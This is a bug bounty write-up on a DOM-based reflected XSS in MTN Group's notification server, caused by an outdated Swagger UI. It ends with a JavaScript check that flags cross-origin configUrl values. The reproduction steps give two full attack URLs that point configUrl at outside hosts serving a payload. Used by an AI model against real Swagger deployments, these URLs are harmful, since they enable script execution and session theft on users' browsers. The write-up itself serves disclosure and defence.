DOM-Based Reflected XSS in MTN Group’s Notification Server | Bug Bounty
Introduction
Cross-Site Scripting (XSS) vulnerabilities remain a prevalent security threat, posing risks to user data and application integrity. In early 2024, security researcher nhx1 uncovered a DOM-Based Reflected XSS vulnerability in MTN Group's notification server, stemming from the use of an outdated version of Swagger. This article explores the discovery, impact, and resolution of this issue.
Discovery of the Vulnerability
While examining MTN Group's systems, researchers identified that the notification server was running an older version of Swagger, which had known XSS vulnerabilities. By manipulating the configUrl parameter, they injected a malicious URL to test for a possible exploit.
Steps to Reproduce
To demonstrate the vulnerability, the following steps were followed:
1. Access the URL:
https://notification-server-v2.sz-my.mtn.com/index.html?configUrl=https://jumpy-floor.surge.sh/test.json
2. Upon loading, an alert box appeared, confirming the successful execution of the XSS payload.
3. A second payload using a different URL was also tested:
https://notification-server-v2.sz-my.mtn.com/index.html?configUrl=https://xss.smarpo.com/test.json
This also resulted in the execution of arbitrary JavaScript.
Potential Impact
An attacker leveraging this vulnerability could execute malicious scripts within the context of MTN Group's notification server. The consequences may include:
- Session hijacking
- Data theft
- Phishing attacks targeting MTN Group users
- Potential account takeovers for services under the *.mtn.com domain
Lessons Learned
This incident underscores the critical need for keeping third-party libraries updated. Security teams and developers should consider the following best practices:
- Regularly update dependencies to patch known vulnerabilities.
- Apply strict input validation and sanitization to prevent malicious data injection.
- Conduct regular security assessments to proactively identify and mitigate risks.
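One way to apply the input-validation point to this specific parameter, as an added example that is not part of the original write-up: a check, usable in a reverse proxy rule or an access-log review, that flags requests whose configUrl resolves to an origin other than the page's own. The function names, the allowlist argument and the sample hosts are assumptions made for illustration.

```javascript
// Added example (not from the write-up): decide whether a request's configUrl
// query parameter would make the documentation page load config cross-origin.
// Parameter names are compared case-folded, which is deliberately conservative.
const WATCHED_PARAMS = ['configurl']; // the parameter named in the write-up

function checkConfigUrl(requestUrl, allowedOrigins = []) {
  let page;
  try {
    page = new URL(requestUrl);
  } catch {
    return { verdict: 'invalid-request', values: [] };
  }
  // The page's own origin is always acceptable; extra origins are opt-in.
  const allowed = new Set([page.origin, ...allowedOrigins]);
  const flagged = [];
  let seen = 0;
  for (const [name, value] of page.searchParams) { // yields repeated params too
    if (!WATCHED_PARAMS.includes(name.toLowerCase())) continue;
    seen++;
    let target;
    try {
      // Resolve like a browser would: handles relative paths and //host forms.
      target = new URL(value, page);
    } catch {
      flagged.push(value); // unparsable value: treat as hostile
      continue;
    }
    const httpLike = target.protocol === 'https:' || target.protocol === 'http:';
    if (!httpLike || !allowed.has(target.origin)) flagged.push(value);
  }
  if (seen === 0) return { verdict: 'absent', values: [] };
  return { verdict: flagged.length ? 'block' : 'allow', values: flagged };
}

// Constructed sample requests; hosts are placeholders, not taken from the write-up.
const SAMPLES = [
  'https://docs.example.test/index.html',
  'https://docs.example.test/index.html?configUrl=/swagger-config.json',
  'https://docs.example.test/index.html?configUrl=https://other.example.net/test.json',
  'https://docs.example.test/index.html?ConfigURL=//other.example.net/test.json',
  'https://docs.example.test/index.html?configUrl=data:application/json,%7B%7D',
];

function scan(urls, allowedOrigins) {
  return urls.map((u) => checkConfigUrl(u, allowedOrigins).verdict);
}

console.log(scan(SAMPLES));
```

This check is a stopgap for deployments that cannot be upgraded immediately; updating the outdated Swagger component remains the actual fix.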
Conclusion
DOM-Based Reflected XSS vulnerabilities pose significant risks, but proactive security measures can mitigate their impact. Thanks to responsible disclosure by nhx1, MTN Group successfully addressed this issue. Collaborative efforts like these strengthen cybersecurity and protect users from malicious threats.
Acknowledgment
Kudos to nhx1 for their diligent research and contribution. Their work serves as an inspiration to the cybersecurity community.